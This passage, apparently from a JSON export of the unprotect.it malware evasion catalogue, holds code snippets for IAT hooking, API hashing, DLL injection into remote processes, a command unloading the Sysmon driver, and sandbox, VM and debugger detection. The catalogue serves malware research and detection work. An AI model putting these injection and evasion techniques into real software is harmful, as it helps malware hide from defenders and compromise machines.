(originalFirstThunk->u1.AddressOfData != NULL)\r\n\t\t\t{\r\n\t\t\t\tfunctionName = (PIMAGE_IMPORT_BY_NAME)((DWORD_PTR)imageBase + originalFirstThunk->u1.AddressOfData);\r\n\t\t\t\t\t\r\n\t\t\t\t// find MessageBoxA address\r\n\t\t\t\tif (std::string(functionName->Name).compare(\"MessageBoxA\") == 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tSIZE_T bytesWritten = 0;\r\n\t\t\t\t\tDWORD oldProtect = 0;\r\n\t\t\t\t\tVirtualProtect((LPVOID)(&firstThunk->u1.Function), 8, PAGE_READWRITE, &oldProtect);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t// swap MessageBoxA address with address of hookedMessageBox\r\n\t\t\t\t\tfirstThunk->u1.Function = (DWORD_PTR)hookedMessageBox;\r\n\t\t\t\t}\r\n\t\t\t\t++originalFirstThunk;\r\n\t\t\t\t++firstThunk;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\timportDescriptor++;\r\n\t}\r\n\r\n\t// message box after IAT hooking\r\n\tMessageBoxA(NULL, \"Hello after Hooking\", \"Hello after Hooking\", 0);\r\n\t\r\n\treturn 0;\r\n}"
        },
        {
            "id": 91,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/75/?format=api",
            "description": "Original source code: https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware",
            "plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n\r\nDWORD getHashFromString(char *string) \r\n{\r\n\tsize_t stringLength = strnlen_s(string, 50);\r\n\tDWORD hash = 0x35;\r\n\t\r\n\tfor (size_t i = 0; i < stringLength; i++)\r\n\t{\r\n\t\thash += (hash * 0xab10f29f + string[i]) & 0xffffff;\r\n\t}\r\n\t// printf(\"%s: 0x00%x\\n\", string, hash);\r\n\t\r\n\treturn hash;\r\n}\r\n\r\nPDWORD getFunctionAddressByHash(char *library, DWORD hash)\r\n{\r\n\tPDWORD functionAddress = (PDWORD)0;\r\n\r\n\t// Get base address of the module in which our exported function of interest resides (kernel32 in the case of CreateThread)\r\n\tHMODULE libraryBase = LoadLibraryA(library);\r\n\r\n\tPIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)libraryBase;\r\n\tPIMAGE_NT_HEADERS imageNTHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)libraryBase + dosHeader->e_lfanew);\r\n\t\r\n\tDWORD_PTR exportDirectoryRVA = imageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\r\n\t\r\n\tPIMAGE_EXPORT_DIRECTORY imageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)libraryBase + exportDirectoryRVA);\r\n\t\r\n\t// Get RVAs to exported function related information\r\n\tPDWORD addresOfFunctionsRVA = (PDWORD)((DWORD_PTR)libraryBase + imageExportDirectory->AddressOfFunctions);\r\n\tPDWORD addressOfNamesRVA = (PDWORD)((DWORD_PTR)libraryBase + imageExportDirectory->AddressOfNames);\r\n\tPWORD addressOfNameOrdinalsRVA = (PWORD)((DWORD_PTR)libraryBase + imageExportDirectory->AddressOfNameOrdinals);\r\n\r\n\t// Iterate through exported functions, calculate their hashes and check if any of them match our hash of 0x00544e304 (CreateThread)\r\n\t// If yes, get its virtual memory address (this is where CreateThread function resides in memory of our process)\r\n\tfor (DWORD i = 0; i < imageExportDirectory->NumberOfFunctions; i++)\r\n\t{\r\n\t\tDWORD functionNameRVA = addressOfNamesRVA[i];\r\n\t\tDWORD_PTR functionNameVA = (DWORD_PTR)libraryBase + 
functionNameRVA;\r\n\t\tchar* functionName = (char*)functionNameVA;\r\n\t\tDWORD_PTR functionAddressRVA = 0;\r\n\r\n\t\t// Calculate hash for this exported function\r\n\t\tDWORD functionNameHash = getHashFromString(functionName);\r\n\t\t\r\n\t\t// If hash for CreateThread is found, resolve the function address\r\n\t\tif (functionNameHash == hash)\r\n\t\t{\r\n\t\t\tfunctionAddressRVA = addresOfFunctionsRVA[addressOfNameOrdinalsRVA[i]];\r\n\t\t\tfunctionAddress = (PDWORD)((DWORD_PTR)libraryBase + functionAddressRVA);\r\n\t\t\tprintf(\"%s : 0x%x : %p\\n\", functionName, functionNameHash, functionAddress);\r\n\t\t\treturn functionAddress;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n// Define CreateThread function prototype\r\nusing customCreateThread = HANDLE(NTAPI*)(\r\n\tLPSECURITY_ATTRIBUTES   lpThreadAttributes,\r\n\tSIZE_T                  dwStackSize,\r\n\tLPTHREAD_START_ROUTINE  lpStartAddress,\r\n\t__drv_aliasesMem LPVOID lpParameter,\r\n\tDWORD                   dwCreationFlags,\r\n\tLPDWORD                 lpThreadId\r\n);\r\n\r\nint main()\r\n{\r\n\t// Resolve CreateThread address by hash\r\n\tPDWORD functionAddress = getFunctionAddressByHash((char *)\"kernel32\", 0x00544e304);\r\n\r\n\t// Point CreateThread function pointer to the CreateThread virtual address resolved by its hash\r\n\tcustomCreateThread CreateThread = (customCreateThread)functionAddress;\r\n\tDWORD tid = 0;\r\n\r\n\t// Call CreateThread\r\n\tHANDLE th = CreateThread(NULL, NULL, NULL, NULL, NULL, &tid);\r\n\r\n\treturn 1;\r\n}"
        },
        {
            "id": 92,
            "language": {
                "id": 7,
                "label": "cmd",
                "code_class": "cmd"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/182/?format=api",
            "description": "",
            "plain_code": "fltMC.exe unload SysmonDrv"
        },
        {
            "id": 93,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/166/?format=api",
            "description": "",
            "plain_code": "PPEB pPEB = (PPEB)__readgsqword(0x60);\r\nPVOID params = (PVOID) * (PQWORD)((PBYTE)pPEB + 0x20);\r\nPWSTR environmental_variables = (PWSTR) * (PQWORD)((PBYTE)params + 0x80);\r\n\r\nwhile (environmental_variables)\r\n{\r\n    PWSTR m = wcsstr(environmental_variables, L\"COMPUTERNAME=\");\r\n    if (m) break;\r\n    environmental_variables += wcslen(environmental_variables) + 1;\r\n}\r\nPWSTR computerName = wcsstr(environmental_variables, L\"=\") + 1;\r\nwcslwr(computerName);\r\nwprintf(L\"%s\", computerName);"
        },
        {
            "id": 80,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/178/?format=api",
            "description": "This code snippet demonstrates how to inject a DLL into a remote process without using `WriteProcessMemory` and `VirtualAlloc(Ex)`.",
            "plain_code": "(*\r\n    Example of DLL Code to test DLL Injection:\r\n    ------------------------------------------\r\n\r\n    BOF>>\r\n\r\n    library UnprotectTestDLL;\r\n\r\n          uses\r\n            WinApi.Windows,\r\n            System.SysUtils,\r\n            System.Classes;\r\n\r\n          {$R *.res}\r\n\r\n          procedure DllMain(AReason: Integer);\r\n          var AMessage   : String;\r\n              AStrReason : String;\r\n          begin\r\n            case AReason of\r\n              DLL_PROCESS_DETACH : AStrReason := 'DLL_PROCESS_DETACH';\r\n              DLL_PROCESS_ATTACH : AStrReason := 'DLL_PROCESS_ATTACH';\r\n              DLL_THREAD_ATTACH  : AStrReason := 'DLL_THREAD_ATTACH';\r\n              DLL_THREAD_DETACH  : AStrReason := 'DLL_THREAD_DETACH';\r\n              else\r\n                AStrReason := 'REASON_UNKNOWN';\r\n            end;\r\n\r\n            AMessage := Format('(%s): Injected! Living in %d (%s) process.', [\r\n              AStrReason,\r\n              GetCurrentProcessId(),\r\n              ExtractFileName(GetModuleName(0))\r\n            ]);\r\n            ///\r\n\r\n            OutputDebugStringW(PWideChar(AMessage));\r\n          end;\r\n\r\n          begin\r\n            DllProc := DllMain;\r\n            DllMain(DLL_PROCESS_ATTACH)\r\n\r\n\r\n    <<EOF\r\n*)\r\n\r\n// Support both x86-32 and x86-64\r\n\r\nprogram ProcEnvInjection_DLLInjection;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n  Winapi.Windows,\r\n  System.Math,\r\n  System.SysUtils;\r\n\r\ntype\r\n  EWindowsException = class(Exception)\r\n  private\r\n    FLastError : Integer;\r\n  public\r\n    {@C}\r\n    constructor Create(const WinAPI : String); overload;\r\n\r\n    {@G}\r\n    property LastError : Integer read FLastError;\r\n  end;\r\n\r\n  {$IFDEF WIN64}\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : Int64;\r\n    PebBaseAddress     : 
Pointer;\r\n    AffinityMask       : Int64;\r\n    BasePriority       : Int64;\r\n    UniqueProcessId    : Int64;\r\n    InheritedUniquePID : Int64;\r\n    end;\r\n  {$ELSE}\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : DWORD;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : DWORD;\r\n    BasePriority       : DWORD;\r\n    UniqueProcessId    : DWORD;\r\n    InheritedUniquePID : DWORD;\r\n    end;\r\n  {$ENDIF}\r\n\r\n  UNICODE_STRING = record\r\n    Length        : Word;\r\n    MaximumLength : Word;\r\n    Buffer        : LPWSTR;\r\n  end;\r\n\r\n  CURDIR = record\r\n    DosPath : UNICODE_STRING;\r\n    Handle  : THandle;\r\n  end;\r\n\r\n  RTL_DRIVE_LETTER_CURDIR = record\r\n    Flags     : Word;\r\n    Length    : Word;\r\n    TimeStamp : ULONG;\r\n    DosPath   : UNICODE_STRING;\r\n  end;\r\n\r\n  TRTLUserProcessParameters = record\r\n    MaximumLength      : ULONG;\r\n    Length             : ULONG;\r\n    Flags              : ULONG;\r\n    DebugFlags         : ULONG;\r\n    ConsoleHandle      : THANDLE;\r\n    ConsoleFlags       : ULONG;\r\n    StandardInput      : THANDLE;\r\n    StandardOutput     : THANDLE;\r\n    StandardError      : THANDLE;\r\n    CurrentDirectory   : CURDIR;\r\n    DllPath            : UNICODE_STRING;\r\n    ImagePathName      : UNICODE_STRING;\r\n    CommandLine        : UNICODE_STRING;\r\n    Environment        : Pointer;\r\n    StartingX          : ULONG;\r\n    StartingY          : ULONG;\r\n    CountX             : ULONG;\r\n    CountY             : ULONG;\r\n    CountCharsX        : ULONG;\r\n    CountCharsY        : ULONG;\r\n    FillAttribute      : ULONG;\r\n    WindowFlags        : ULONG;\r\n    ShowWindowFlags    : ULONG;\r\n    WindowTitle        : UNICODE_STRING;\r\n    DesktopInfo        : UNICODE_STRING;\r\n    ShellInfo          : UNICODE_STRING;\r\n    RuntimeData        : UNICODE_STRING;\r\n    CurrentDirectories : array 
[0 .. 32-1] of RTL_DRIVE_LETTER_CURDIR;\r\n  end;\r\n  PRTLUserProcessParameters = ^TRTLUserProcessParameters;\r\n\r\n  TPEB = record\r\n    Reserved1              : array [0..2-1] of Byte;\r\n    BeingDebugged          : Byte;\r\n    Reserved2              : Byte;\r\n    Reserved3              : array [0..2-1] of Pointer;\r\n    Ldr                    : Pointer;\r\n    ProcessParameters      : PRTLUserProcessParameters;\r\n    Reserved4              : array [0..103-1] of Byte;\r\n    Reserved5              : array [0..52-1] of Pointer;\r\n    PostProcessInitRoutine : Pointer;\r\n    Reserved6              : array [0..128-1] of byte;\r\n    Reserved7              : Pointer;\r\n    SessionId              : ULONG;\r\n  end;\r\n  PPEB = ^TPEB;\r\n\r\nfunction NtQueryInformationProcess(\r\n  ProcessHandle : THandle;\r\n  ProcessInformationClass : DWORD;\r\n  ProcessInformation : Pointer;\r\n  ProcessInformationLength : ULONG;\r\n  ReturnLength : PULONG\r\n): LongInt; stdcall; external 'ntdll.dll';\r\n\r\nconst PROCESS_BASIC_INFORMATION = 0;\r\n\r\nconstructor EWindowsException.Create(const WinAPI : String);\r\nvar AFormatedMessage : String;\r\nbegin\r\n  FLastError := GetLastError();\r\n\r\n  AFormatedMessage := Format('___%s: last_err=%d, last_err_msg=\"%s\".', [\r\n      WinAPI,\r\n      FLastError,\r\n      SysErrorMessage(FLastError)\r\n  ]);\r\n\r\n  ///\r\n  inherited Create(AFormatedMessage);\r\nend;\r\n\r\nfunction RandomString(ALength : Word) : String;\r\nconst AChars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';\r\nvar I : Integer;\r\nbegin\r\n  result := '';\r\n  ///\r\n\r\n  randomize;\r\n\r\n  for I := 1 to ALength do begin\r\n      result := result + AChars[random(length(AChars))+1];\r\n  end;\r\nend;\r\n\r\n\r\nfunction InjectDLL(const ADLLPath : String; AHostApplication: String; const AEggLength : Cardinal = 5) : Boolean;\r\nvar AStartupInfo              : TStartupInfo;\r\n    AProcessInfo              : TProcessInformation;\r\n    
AEnvLen                   : Cardinal;\r\n    pEnvBlock                 : Pointer;\r\n    ARetLen                   : Cardinal;\r\n    PBI                       : TProcessBasicInformation;\r\n    APEB                      : TPEB;\r\n    ABytesRead                : SIZE_T;\r\n    ARTLUserProcessParameters : TRTLUserProcessParameters;\r\n    i                         : Integer;\r\n    pOffset                   : Pointer;\r\n    APayloadEgg               : String;\r\n    APayloadEnv               : String;\r\n    ABuffer                   : array of byte;\r\n    pPayloadOffset            : Pointer;\r\n    AThreadId                 : Cardinal;\r\nbegin\r\n  ZeroMemory(@AStartupInfo, SizeOf(TStartupInfo));\r\n  AStartupInfo.cb := SizeOf(TStartupInfo);\r\n\r\n  ZeroMemory(@AProcessInfo, SizeOf(TProcessInformation));\r\n\r\n  result := False;\r\n\r\n  APayloadEgg := RandomString(AEggLength);\r\n  APayloadEnv := Format('%s=%s', [APayloadEgg, ADLLPath]);\r\n\r\n  AEnvLen := (Length(APayloadEnv) * SizeOf(WideChar));\r\n\r\n  GetMem(pEnvBlock, AEnvLen);\r\n  try\r\n    ZeroMemory(pEnvBlock, AEnvLen);\r\n    Move(PWideChar(APayloadEnv)^, pEnvBlock^, AEnvLen);\r\n    ///\r\n\r\n    UniqueString(AHostApplication);\r\n\r\n    if not CreateProcessW(\r\n        PWideChar(AHostApplication),\r\n        nil,\r\n        nil,\r\n        nil,\r\n        False,\r\n        CREATE_NEW_CONSOLE or CREATE_UNICODE_ENVIRONMENT,\r\n        pEnvBlock,\r\n        nil,\r\n        AStartupInfo,\r\n        AProcessInfo\r\n    ) then\r\n      raise EWindowsException.Create('CreateProcessW');\r\n\r\n    // Tiny trick to be sure new process is completely initailized.\r\n    // Remove bellow if you find it problematic.\r\n    WaitForInputIdle(AProcessInfo.hProcess, INFINITE);\r\n\r\n    if NtQueryInformationProcess(\r\n        AProcessInfo.hProcess,\r\n        PROCESS_BASIC_INFORMATION,\r\n        @PBI,\r\n        SizeOf(TProcessBasicInformation),\r\n        @ARetLen\r\n    ) <> ERROR_SUCCESS then\r\n      
raise EWindowsException.Create('NtQueryInformationProcess');\r\n\r\n    if not ReadProcessMemory(\r\n        AProcessInfo.hProcess,\r\n        PBI.PebBaseAddress,\r\n        @APEB,\r\n        SizeOf(TPEB),\r\n        ABytesRead\r\n    ) then\r\n      raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n    if not ReadProcessMemory(\r\n        AProcessInfo.hProcess,\r\n        APEB.ProcessParameters,\r\n        @ARTLUserProcessParameters,\r\n        SizeOf(TRTLUserProcessParameters),\r\n        ABytesRead\r\n    ) then\r\n      raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n    // Scan Environment Variable Memory Block\r\n    I := 0;\r\n\r\n    SetLength(ABuffer, AEggLength * SizeOf(WideChar));\r\n\r\n    pPayloadOffset := nil;\r\n\r\n    while true do begin\r\n      pOffset := Pointer(NativeUInt(ARTLUserProcessParameters.Environment) + I);\r\n      ///\r\n\r\n      if not ReadProcessMemory(\r\n          AProcessInfo.hProcess,\r\n          pOffset,\r\n          @ABuffer[0],\r\n          Length(ABuffer),\r\n          ABytesRead\r\n      ) then\r\n        raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n      if CompareMem(PWideChar(ABuffer), PWideChar(APayloadEgg), Length(ABuffer)) then begin\r\n        pPayloadOffset := Pointer(NativeUInt(pOffset) + Length(ABuffer) + SizeOf(WideChar) { =\\0 });\r\n\r\n        break;\r\n      end;\r\n\r\n      Inc(I, 2);\r\n    end;\r\n\r\n    SetLength(ABuffer, 0);\r\n\r\n    if not Assigned(pPayloadOffset) then\r\n      raise Exception.Create('Could not locate Injected DLL Path offset from remote process environment.');\r\n\r\n    // Debug, read DLL path from remote process\r\n//    SetLength(ABuffer, AEnvLen - (5 * SizeOf(WideChar)));\r\n//    ReadProcessMemory(\r\n//        AProcessInfo.hProcess,\r\n//        pPayloadOffset,\r\n//        @ABuffer[0],\r\n//        Length(ABuffer),\r\n//        ABytesRead\r\n//    );\r\n//    WriteLn(PWideChar(ABuffer));\r\n\r\n    // Start DLL Injection\r\n    if 
CreateRemoteThread(\r\n        AProcessInfo.hProcess,\r\n        nil,\r\n        0,\r\n        GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryW'),\r\n        pPayloadOffset,\r\n        0,\r\n        AThreadId\r\n    ) = 0 then\r\n      raise EWindowsException.Create('CreateRemoteThread');\r\n  finally\r\n    FreeMem(pEnvBlock, AEnvLen);\r\n  end;\r\nend;\r\n\r\nbegin\r\n  try\r\n    InjectDLL('C:\\Temp\\UnprotectTestDLL.dll', 'C:\\Program Files\\Notepad++\\notepad++.exe');\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "id": 81,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/93/?format=api",
            "description": "",
            "plain_code": "(*\r\n    Example of DLL Code to test DLL Injection:\r\n    ------------------------------------------\r\n\r\n    BOF>>\r\n\r\n    library UnprotectTestDLL;\r\n\r\n          uses\r\n            WinApi.Windows,\r\n            System.SysUtils,\r\n            System.Classes;\r\n\r\n          {$R *.res}\r\n\r\n          procedure DllMain(AReason: Integer);\r\n          var AMessage   : String;\r\n              AStrReason : String;\r\n          begin\r\n            case AReason of\r\n              DLL_PROCESS_DETACH : AStrReason := 'DLL_PROCESS_DETACH';\r\n              DLL_PROCESS_ATTACH : AStrReason := 'DLL_PROCESS_ATTACH';\r\n              DLL_THREAD_ATTACH  : AStrReason := 'DLL_THREAD_ATTACH';\r\n              DLL_THREAD_DETACH  : AStrReason := 'DLL_THREAD_DETACH';\r\n              else\r\n                AStrReason := 'REASON_UNKNOWN';\r\n            end;\r\n\r\n            AMessage := Format('(%s): Injected! Living in %d (%s) process.', [\r\n              AStrReason,\r\n              GetCurrentProcessId(),\r\n              ExtractFileName(GetModuleName(0))\r\n            ]);\r\n            ///\r\n\r\n            OutputDebugStringW(PWideChar(AMessage));\r\n          end;\r\n\r\n          begin\r\n            DllProc := DllMain;\r\n            DllMain(DLL_PROCESS_ATTACH)\r\n\r\n\r\n    <<EOF\r\n*)\r\n\r\n// Support both x86-32 and x86-64\r\n\r\nprogram DLLInjection_CreateRemoteThread_LoadLibrary;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n  WinApi.Windows,\r\n  System.SysUtils;\r\n\r\ntype\r\n  EWindowsException = class(Exception)\r\n  private\r\n    FLastError : Integer;\r\n  public\r\n    {@C}\r\n    constructor Create(const WinAPI : String); overload;\r\n\r\n    {@G}\r\n    property LastError : Integer read FLastError;\r\n  end;\r\n\r\n\r\nconstructor EWindowsException.Create(const WinAPI : String);\r\nvar AFormatedMessage : String;\r\nbegin\r\n  FLastError := GetLastError();\r\n\r\n  AFormatedMessage := Format('___%s: 
last_err=%d, last_err_msg=\"%s\".', [\r\n      WinAPI,\r\n      FLastError,\r\n      SysErrorMessage(FLastError)\r\n  ]);\r\n\r\n  ///\r\n  inherited Create(AFormatedMessage);\r\nend;\r\n\r\nprocedure InjectDLL(const ADLLFile : String; const ATargetProcessId : Cardinal);\r\nvar hProcess      : THandle;\r\n    pOffset       : Pointer;\r\n    AThreadId     : Cardinal;\r\n    ABytesWritten : SIZE_T;\r\nbegin\r\n  if not FileExists(ADLLFile) then\r\n    raise Exception.Create('DLL file not found!');\r\n  ///\r\n\r\n  hProcess := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_VM_WRITE, False, ATargetProcessId);\r\n  if hProcess = 0 then\r\n    raise EWindowsException.Create('OpenProcess');\r\n  try\r\n    pOffset := VirtualAllocEx(hProcess, nil, Length(ADLLFile), MEM_COMMIT, PAGE_READWRITE);\r\n    if not Assigned(pOffset) then\r\n      raise EWindowsException.Create('VirtualAllocEx');\r\n\r\n    if not WriteProcessMemory(hProcess, pOffset, PWideChar(ADLLFile), Length(ADLLFile) * SizeOf(WideChar), ABytesWritten) then\r\n      raise EWindowsException.Create('WriteProcessMemory');\r\n\r\n    if CreateRemoteThread(hProcess, nil, 0, GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryW'), pOffset, 0, AThreadId) = 0 then\r\n      raise EWindowsException.Create('CreateRemoteThread');\r\n  finally\r\n    CloseHandle(hProcess);\r\n  end;\r\nend;\r\n\r\nbegin\r\n  try\r\n    InjectDLL('c:\\temp\\UnprotectTestDLL.dll' {Desired DLL To Inject}, 12196 {Desired Process Id});\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "id": 82,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/29/?format=api",
            "description": "",
            "plain_code": "program ADetectMouseMove;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n  WinApi.Windows,\r\n  WinApi.ShellAPI,\r\n  System.Classes,\r\n  System.SysUtils;\r\n\r\nvar APoint     : TPoint;\r\n    AOldPoint  : TPoint;\r\n    AMoveCount : Cardinal;\r\n\r\n// Update bellow constant to require more mouse move check before continue code execution\r\nconst AMaxMove = 5;\r\n\r\nbegin\r\n  try\r\n    GetCursorPos(AOldPoint);\r\n    ///\r\n\r\n    AMoveCount := 0;\r\n    while True do begin\r\n      GetCursorPos(APoint);\r\n\r\n      if not PointsEqual(APoint, AOldPoint) then begin\r\n        AOldPoint := APoint;\r\n\r\n        Inc(AMoveCount);\r\n      end;\r\n\r\n      if AMoveCount >= AMaxMove then\r\n        break;\r\n\r\n      Sleep(1000);\r\n    end;\r\n\r\n    ///\r\n\r\n    WriteLn('Mouse has moved, continue execution...');\r\n\r\n    ShellExecuteW(0, 'open', 'calc.exe', nil, nil, SW_SHOW);\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "id": 76,
            "language": {
                "id": 9,
                "label": "C#",
                "code_class": "csharp"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/8/?format=api",
            "description": "",
            "plain_code": "using System.Net.NetworkInformation;\r\n\r\n/*\r\nString[] vmMacAddresses =\r\n{\r\n    \"08:00:27\",\r\n    \"00:0C:29\",\r\n    \"00:1C:14\",\r\n    \"00:50:56\",\r\n    \"00:05:69\",\r\n};\r\n*/\r\n\r\nvar vmMacAddresses = new Dictionary<string, string>();\r\n\r\nvmMacAddresses.Add(\"08:00:27\", \"VirtualBox\");\r\nvmMacAddresses.Add(\"00:0C:29\", \"VMWare\");\r\nvmMacAddresses.Add(\"00:1C:14\", \"VMWare\");\r\nvmMacAddresses.Add(\"00:50:56\", \"VMWare\");\r\nvmMacAddresses.Add(\"00:05:69\", \"VMWare\");\r\n// Add other ones bellow...\r\n\r\nforeach (NetworkInterface netInterface in NetworkInterface.GetAllNetworkInterfaces())\r\n{\r\n    PhysicalAddress physicalAddress = netInterface.GetPhysicalAddress();\r\n    if (physicalAddress == null)\r\n    {\r\n        continue;\r\n    }\r\n\r\n    String mac = String.Join(\":\", (from b in physicalAddress.GetAddressBytes().Take(3) select b.ToString(\"X2\")));\r\n\r\n    if (vmMacAddresses.ContainsKey(mac))\r\n    {\r\n        throw new Exception(\r\n            String.Format(\"{0} Detected from its MAC Address.\", vmMacAddresses.GetValueOrDefault(mac))            \r\n        );\r\n    }\r\n\r\n    Console.WriteLine(\"No VM Detected :)\");\r\n}"
        },
        {
            "id": 77,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/54/?format=api",
            "description": "",
            "plain_code": "program NtQueryProcessInformation;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n  Winapi.Windows,\r\n  System.SysUtils;\r\n\r\nfunction NtQueryInformationProcess(\r\n  ProcessHandle : THandle;\r\n  ProcessInformationClass : DWORD;\r\n  ProcessInformation : Pointer;\r\n  ProcessInformationLength : ULONG;\r\n  ReturnLength : PULONG\r\n): LongInt; stdcall; external 'ntdll.dll';\r\n\r\n// https://docs.microsoft.com/en-gb/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess\r\nfunction isDebuggerPresent(): Boolean;\r\nvar hProcess : THandle;\r\n    APortNumber : DWORD;\r\n    ARetLen : Cardinal;\r\n\r\nconst ProcessDebugPort = 7;\r\nbegin\r\n  hProcess := GetCurrentProcess();\r\n  if hProcess = 0 then\r\n    Exit();\r\n  ///\r\n\r\n  if NtQueryInformationProcess(hProcess, ProcessDebugPort, @APortNumber, sizeOf(DWORD), @ARetLen) <> ERROR_SUCCESS then\r\n    Exit();\r\n\r\n  result := APortNumber <> 0;\r\nend;\r\n\r\nbegin\r\n  try\r\n    if isDebuggerPresent() then\r\n      raise Exception.Create('Debugger Detected !');\r\n\r\n    WriteLn('No Debugger Detected :)');\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\n\r\n  WriteLn('Press a return key to close application.');\r\n  ReadLn;\r\nend."
        },
        {
            "id": 78,
            "language": {
                "id": 9,
                "label": "C#",
                "code_class": "csharp"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/54/?format=api",
            "description": "",
            "plain_code": "using System;\r\nusing System.Runtime.InteropServices;\r\n\r\n[DllImport(\"ntdll.dll\", SetLastError = true)]\r\nstatic extern int NtQueryInformationProcess(\r\n    IntPtr processHandle,\r\n    int processInformationClass,\r\n    ref IntPtr processInformation,\r\n    uint processInformationLength,\r\n    ref IntPtr returnLength\r\n);\r\n\r\n[DllImport(\"kernel32.dll\", SetLastError = true)]\r\nstatic extern IntPtr GetCurrentProcess();\r\n\r\nbool isBeingDebugged()\r\n{\r\n    var ERROR_SUCCESS = 0x0;\r\n    var ProcessDebugPort = 0x7;\r\n\r\n    IntPtr currProcessHandle = GetCurrentProcess();\r\n    if (currProcessHandle == IntPtr.Zero)\r\n    {\r\n        throw new Exception(\"Could not retrieve current process handle.\");\r\n    }\r\n\r\n    IntPtr returnLength = IntPtr.Zero;\r\n    IntPtr portNumber = IntPtr.Zero;\r\n\r\n    int ntStatus = NtQueryInformationProcess(currProcessHandle, ProcessDebugPort, ref portNumber, (uint)IntPtr.Size, ref returnLength);        \r\n    if (ntStatus != ERROR_SUCCESS)\r\n    {\r\n        throw new Exception(\"Could not query information process.\");\r\n    }\r\n\r\n    return (portNumber != IntPtr.Zero);\r\n}\r\n\r\nif (isBeingDebugged())\r\n{\r\n    throw new Exception(\"Debugger Detected 